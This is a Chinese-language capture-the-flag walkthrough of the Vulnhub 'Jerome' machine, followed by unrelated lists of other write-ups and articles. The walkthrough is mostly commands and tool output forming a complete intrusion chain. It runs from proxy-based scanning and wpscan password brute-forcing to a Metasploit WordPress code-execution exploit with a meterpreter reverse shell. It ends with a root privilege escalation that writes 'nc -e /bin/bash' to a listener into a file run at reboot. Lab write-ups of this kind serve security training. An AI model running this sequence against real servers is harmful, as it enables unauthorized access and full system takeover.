nmap 扫描探测:

╰─ nmap -p1-65535 -sV -A -O -sT 10.10.202.135
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-31 10:15 CST
Nmap scan report for 10.10.202.135
Host is up (0.00091s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy 3.5.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: squid/3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:75:E4:B1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

先尝试搜索squid漏洞库

╰─ searchsploit squid

此示例的squid的版本为:<p>Generated Wed, 31 Jul 2019 02:34:31 GMT by jerome (squid/3.5.27)</p>

既然是代理服务器,我们只能设置代理,进行目录爆破

╰─ dirb http://127.0.0.1 -p 10.10.202.135:8080

---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/index.html (CODE:200|SIZE:19)
+ http://127.0.0.1/server-status (CODE:200|SIZE:4021)

访问:http://127.0.0.1/server-status

多次刷新会发现:

1337端口开放 看到是wp的程序,进行目录枚举一下

╰─ dirb http://127.0.0.1:1337/ -p 10.10.202.135:8080

进行插件漏洞扫描,并枚举用户密码:

╰─ wpscan -u http://127.0.0.1:1337/wordpress/ --proxy 10.10.202.135:8080 -e u vp

[!] The WordPress 'http://127.0.0.1:1337/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://localhost:1337/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.29 (Ubuntu)
[+] Interesting header: VIA: 1.1 jerome (squid/3.5.27)
[+] Interesting header: X-CACHE: MISS from jerome
[+] Interesting header: X-CACHE-LOOKUP: HIT from jerome:8080
[+] XML-RPC Interface available under: http://127.0.0.1:1337/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://127.0.0.1:1337/wordpress/wp-includes/

[+] WordPress version 5.0 (Released on 2018-12-06) identified from links opml, meta generator
[!] 9 vulnerabilities identified from the version number

.......

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+--------+--------+
| Id | Login | Name |
+----+--------+--------+
| 1 | root | root |
| 4 | jerome | jerome |
+----+--------+--------+

[+] Finished: Wed Jul 31 14:39:16 2019
[+] Requests Done: 644
[+] Memory used: 38.043 MB
[+] Elapsed time: 00:00:04

尝试用户密码爆破下

╰─ wpscan -u http://127.0.0.1:1337/wordpress/ --proxy 10.10.202.135:8080 -e u --wordlist /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt

login: jerome and password: jerome

登录后台寻找上传点

尝试上传.php3 .php5 .php.xxx .php%00.jpg 未果

回到最新的漏洞探测选择一个RCE来试试:

[!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
Reference: https://wpvulndb.com/vulnerabilities/9222
Reference: https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
Reference: https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
[i] Fixed in: 5.0.1

https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce

# apt update; apt install metasploit-framework

msf5 > use exploit/multi/http/wp_crop_rce

msf5 exploit(multi/http/wp_crop_rce) > show options

Module options (exploit/multi/http/wp_crop_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http:10.10.202.135:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.202.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 WordPress

进行提权操作:

重启root执行此文件,我们看下文件脚本的内容

每次开启重启,都会执行Jerome目录下的ls文件,当前用户的家目录,尝试把shell写进ls文件中

jerome@jerome:/var/www/html/wordpress$ cd /home/jerome
cd /home/jerome
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 10.10.202.133 1234" >> ls
echo "nc -e /bin/bash 10.10.202.133 1234" >> ls
jerome@jerome:/home/jerome$ chmod 777 ls

本地监听1234,等待下次重启,获取root权限

Jerome: Vulnhub Walkthrough的更多相关文章

  1. HA Joker Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...

  2. HA: ISRO Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...

  3. LAMPSecurity: CTF6 Vulnhub Walkthrough

    镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...

  4. Hacker Fest: 2019 Vulnhub Walkthrough

    靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...

  5. DC8: Vulnhub Walkthrough

    镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...

  6. HA: Infinity Stones Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...

  7. Sunset: Nightfall Vulnhub Walkthrough

    靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting ...

  8. Dc:7 Vulnhub Walkthrough

    靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出 ...

  9. AI: Web: 2 Vulnhub Walkthrough

    靶机下载链接: https://www.vulnhub.com/entry/ai-web-2,357 主机端口扫描: 尝试SQL注入,未发现有注入漏洞,就注册创建于一账户 http://10.10.2 ...

随机推荐

  1. RestTemplate常用的get和post带参数请求

    在RestTemplate提供的方法中,有一个参数就是目标URL,参数是跟在后面的一个数量可变参数,但是在这里就有个问题,这个方法怎么知道我传的参数值是对应在目标接口的哪个参数的呢: public & ...

  2. 自然语言处理(NLP)相关学习资料/资源

    自然语言处理(NLP)相关学习资料/资源 1. 书籍推荐 自然语言处理 统计自然语言处理(第2版) 作者:宗成庆 出版社:清华大学出版社:出版年:2013:页数:570 内容简介:系统地描述了神经网络 ...

  3. IPhone下json的解析 NSJSONSerialization

    JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式. 易于人阅读和编写.同时也易于机器解析和生成. 它基于JavaScript Programming Lan ...

  4. 分布式监控数据采集系统Ganglia实战

    一.什么是Ganglia 对于这个工具,大家可能比较陌生,但是它功能非常强大,如果我们想收集所有服务器.网络设备的数据,那么ganglia绝对是首选,在深入学习之前,还是先从基础概念了解起吧! Gan ...

  5. 基于cyusb3014的usb3.0双目摄像头开发测试小结(使用mt9m001c12stm)

    测试图像 摄像头分辨率为1280*1024,双目分辨率为2560*1024 ps:时钟频率太高,时序约束还得进一步细化,图像偶尔会出现部分雪花,下一步完善

  6. java概述和java环境按照,java开发体验

    java概述: Java的发展可以归纳如下的几个阶段. (1)第一阶段(完善期):JDK 1.0 ( 1995年推出)一JDK 1.2 (1998年推出,Java更名为Java 2): (2)第二阶段 ...

  7. Neety的基础使用及说明

    BIO(缺乏弹性伸缩能力,并发量小,容易出现内存溢出,出现宕机 每一个客户端对应一个线程 伪异步IO:创建线程池,由线程池里边的线程负责连接处理,M个个请求进来时,会在线程池创建N个线程.容易出现线程 ...

  8. poj 2398 Toy Storage(计算几何)

    题目传送门:poj 2398 Toy Storage 题目大意:一个长方形的箱子,里面有一些隔板,每一个隔板都可以纵切这个箱子.隔板将这个箱子分成了一些隔间.向其中扔一些玩具,每个玩具有一个坐标,求有 ...

  9. hdu 1255 覆盖的面积 (扫描线求矩形交)

    覆盖的面积 Time Limit: 10000/5000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others)Total Subm ...

  10. 服务器上无法调用Office组件的解决方法(HRESULT:0X800A03EC异常)

    HRESULT:0X800A03EC的异常,经过多番查找,终于找到了解决方法,在 Windows 2008 中, 如果以 SYSTEM 用户跑, 系统会去寻找 SYSTEM 这个用户的 Profile ...